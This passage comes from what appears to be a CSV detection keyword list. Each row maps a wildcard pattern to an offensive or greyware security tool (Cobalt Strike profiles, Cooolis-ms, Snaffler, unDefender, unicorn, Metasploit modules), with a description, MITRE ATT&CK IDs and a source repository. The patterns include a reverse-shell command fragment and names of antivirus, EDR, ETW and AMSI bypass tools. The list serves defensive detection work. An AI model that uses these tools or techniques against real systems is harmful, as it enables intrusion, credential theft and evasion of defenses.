further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*UlBDIFNlcnZlciBQb3J0*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*Ullaakut/Gorsair*,offensive_tool_keyword,Gorsair,Gorsair hacks its way into remote docker containers that expose their APIs,T1552,TA0006,N/A,N/A,Exploitation tools,https://github.com/Ullaakut/Gorsair,1,1,N/A,N/A,9,825,74,2023-09-09T13:18:33Z,2018-08-02T16:49:14Z -*UltraSnaffCore.csproj*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*UltraSnaffler.sln*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*UltraSnaffler.sln*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1595 - T1592 - T1589 - T1590 - T1591,TA0043,N/A,N/A,Reconnaissance,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*UMJjAiNUUtvNww0lBj9tzWegwphuIn6hNP9eeIDfOrcHJ3nozYFPT-Jl7WsmbmjZnQXUesoJkcJkpdYEdqgQFE6QZgjWVsLSSDonL28DYDVJ*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*UmVmbGVjdGl2ZSBETEwgaW5qZWN0aW9u*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*UmVmbGVjdGl2ZSBETEwgT1NTIEJ1Y2tldA==*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*UmVmbGVjdGl2ZSBETEwgUGF0aA==*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*UmVmbGVjdGl2ZSBETEwgVVJJ*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*UmVmbGVjdGl2ZSBJbmplY3QgUHJvY2VzcyBJZA==*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*Un1k0d3r/SCShell*,offensive_tool_keyword,cobaltstrike,Fileless lateral movement tool that relies on ChangeServiceConfigA to run command,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Mr-Un1k0d3r/SCShell,1,1,N/A,10,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*uname -a* w* id* /bin/bash -i*,greyware_tool_keyword,shell,Reverse Shell Command Line,T1105 - T1021.001 - T1021.002,TA0002 - TA0008,N/A,N/A,shell spawning,https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml,1,0,greyware tool - risks of False positive !,N/A,10,6749,1943,2023-10-03T04:55:17Z,2016-12-24T09:48:49Z -*uname=FUZZ&pass=FUZZ*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*Unblock-File .\install.ps1*,offensive_tool_keyword,commando-vm,CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.,T1059 - T1053 - T1055 - T1070,TA0002 - TA0004 - TA0008,N/A,N/A,Exploitation OS,https://github.com/mandiant/commando-vm,1,0,N/A,N/A,10,6323,1248,2023-10-03T19:02:49Z,2019-03-26T22:36:32Z -*Unconstrained_Delegation_Systems.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Und3rf10w*,offensive_tool_keyword,Github Username,github repo hosting offensive tools and exploitation frameworks,N/A,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Und3rf10w,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*unDefender-master*,offensive_tool_keyword,unDefender,Killing your preferred antimalware by abusing native symbolic links and NT paths.,T1562.001 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/APTortellini/unDefender,1,1,N/A,10,4,309,78,2022-01-29T12:35:31Z,2021-08-21T14:45:39Z -*undertheradar-main*,offensive_tool_keyword,undertheradar,scripts that afford the pentester AV bypass techniques,T1055.005 - T1027 - T1116 - T1070.004,TA0040 - TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/g3tsyst3m/undertheradar,1,1,N/A,9,1,7,0,2023-08-10T00:30:20Z,2023-07-01T17:59:20Z -*unexpected bytes remain after decoding*,greyware_tool_keyword,ssh,Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml,1,0,greyware tool - risks of False positive !,N/A,10,4099,1019,2023-08-09T15:42:59Z,2013-09-17T17:07:58Z -*unexpected internal error*,greyware_tool_keyword,ssh,Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml,1,0,greyware tool - risks of False positive !,N/A,10,4099,1019,2023-08-09T15:42:59Z,2013-09-17T17:07:58Z -*unhide-implant*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*unhook kernel32*,offensive_tool_keyword,C2 related tools,Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/mgeeky/ThreadStackSpoofer,1,0,N/A,10,10,875,158,2022-06-17T18:06:35Z,2021-09-26T22:48:17Z -*unhook wldp amsi*,offensive_tool_keyword,C2 related tools,Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/mgeeky/ThreadStackSpoofer,1,0,N/A,10,10,875,158,2022-06-17T18:06:35Z,2021-09-26T22:48:17Z -*UnhookingKnownDlls.*,offensive_tool_keyword,ntdlll-unhooking-collection,unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless),T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/ntdlll-unhooking-collection,1,1,N/A,9,2,152,34,2023-08-02T02:26:33Z,2023-02-07T16:54:15Z -*UnhookingNtdll_disk.*,offensive_tool_keyword,ntdlll-unhooking-collection,unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless),T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/ntdlll-unhooking-collection,1,1,N/A,9,2,152,34,2023-08-02T02:26:33Z,2023-02-07T16:54:15Z -*UnhookingPatch-main*,offensive_tool_keyword,UnhookingPatch,Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime,T1055 - T1055.001 - T1070 - T1070.004 - T1211,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/UnhookingPatch,1,1,N/A,9,3,259,43,2023-08-02T02:25:38Z,2023-02-08T16:21:03Z -*UniByAv*,offensive_tool_keyword,UniByAv,UniByAv is a simple obfuscator that take raw shellcode and generate executable that are Anti-Virus friendly. The obfuscation routine is purely writtend in assembly to remain pretty short and efficient. In a nutshell the application generate a 32 bits xor key and brute force the key at run time then perform the decryption of the actually shellcode.,T1027 - T1059 - T1029,TA0002 - TA0003 - TA0007,N/A,N/A,Defense Evasion,https://github.com/Mr-Un1k0d3r/UniByAv,1,1,N/A,N/A,3,239,67,2018-10-26T15:25:26Z,2017-08-15T21:57:15Z -*unicorn.py *,offensive_tool_keyword,unicorn,Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory,T1059.001 - T1055.012 - T1027.002 - T1547.009,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/trustedsec/unicorn,1,0,N/A,N/A,10,3503,839,2023-09-15T05:43:27Z,2013-06-19T08:38:06Z -*unicorn-master.zip*,offensive_tool_keyword,unicorn,Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory,T1059.001 - T1055.012 - T1027.002 - T1547.009,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/trustedsec/unicorn,1,1,N/A,N/A,10,3503,839,2023-09-15T05:43:27Z,2013-06-19T08:38:06Z -*unixpickle*,offensive_tool_keyword,Github Username,github repo hosting obfuscation tools,N/A,N/A,N/A,N/A,Defense Evasion,https://github.com/unixpickle,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*unknown or unsupported key type*,greyware_tool_keyword,ssh,Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml,1,0,greyware tool - risks of False positive !,N/A,10,4099,1019,2023-08-09T15:42:59Z,2013-09-17T17:07:58Z -*unkvolism/Fuck-Etw*,offensive_tool_keyword,Fuck-Etw,Bypass the Event Trace Windows(ETW) and unhook ntdll.,T1070.004 - T1055.001,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/unkvolism/Fuck-Etw,1,1,N/A,10,1,63,9,2023-09-29T21:19:10Z,2023-09-25T18:59:10Z -*unmanagedPowershell */command*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,0,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*unmarshal_cmd_exec.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*UnmarshalPwn.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*UnmarshalPwn.exe*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 